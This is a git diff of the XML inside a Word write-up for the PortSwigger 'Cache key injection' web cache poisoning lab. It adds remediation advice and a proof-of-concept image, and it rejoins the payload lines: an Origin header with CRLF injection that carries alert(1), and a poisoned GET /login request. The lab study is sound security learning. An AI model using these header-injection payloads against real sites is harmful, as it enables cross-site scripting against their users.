--- a/PortSwigger Labs/Advanced Topics/Web Cache Poisoning/Lab 11 - Cache key injection.docx
+++ b/PortSwigger Labs/Advanced Topics/Web Cache Poisoning/Lab 11 - Cache key injection.docx
@@ -848,6 +848,198 @@
           <w:szCs w:val="40"/>
         </w:rPr>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Key All Input Parameters:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ensure that all parameters, including those in the query string and headers, are part of the cache key. This prevents an attacker from injecting malicious content into cache responses.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Limit Use of Dynamic Headers: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Headers like Origin shouldn't be reflected or used in responses without strict validation. If such headers are needed for functionality (like CORS), validate against a whitelist of allowed origins.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Avoid URL Redirections:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Limit or avoid URL redirection based on user input. If unavoidable, ensure user inputs are strictly validated and sanitized.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Escape Output:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Always escape user-controlled input that is reflected in HTML or JavaScript to prevent cross-site scripting (XSS) attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Sanitize Inputs:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implement strict input validation for all user-controlled data. Ensure data conforms to expected formats, ranges, and values.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Content Security Policy:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implement a strong Content Security Policy (CSP) to mitigate the risk of cross-site scripting and other code injection attacks. A good CSP restricts sources of scripts and other resources, mitigating the risks posed by injection attacks.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -952,6 +1144,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="32094136"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="71A8959E"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="332130BB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="962E0D12"/>
@@ -1042,7 +1323,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="38A70C9F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="93DE0F5A"/>
@@ -1131,7 +1412,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7EBF2E70"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1E948CE8"/>
@@ -1224,12 +1505,15 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1715697602">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1129854811">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="1129854811">
+  <w:num w:numId="4" w16cid:durableId="1168792283">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="1168792283">
+  <w:num w:numId="5" w16cid:durableId="791366848">
     <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>

--- a/PortSwigger Labs/Advanced Topics/Web Cache Poisoning/Lab 11 - Cache key injection.docx
+++ b/PortSwigger Labs/Advanced Topics/Web Cache Poisoning/Lab 11 - Cache key injection.docx
@@ -39,15 +39,7 @@
         <w:t xml:space="preserve">We will try to exploit </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">the XSS vulnerability and inject a payload that will execute </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>alert(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>1) in the victim's browser</w:t>
+        <w:t>the XSS vulnerability and inject a payload that will execute alert(1) in the victim's browser</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -728,6 +720,93 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5956B256" wp14:editId="6E04710B">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>325755</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="1109980"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1777909" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1777909" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="1109980"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>PAYLOAD</w:t>
       </w:r>
     </w:p>
@@ -781,15 +860,7 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t>Origin: x%0d%0aContent-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Length:%</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>208%0d%0a%0d%0aalert(1)$$$$</w:t>
+        <w:t>Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -801,19 +872,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250</w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>aContent-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Length:%</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>208%250d%250a%250d%250aalert(1)$$%23 HTTP/1.1</w:t>
+        <w:t>GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/1.1</w:t>
       </w:r>
     </w:p>
     <w:p>
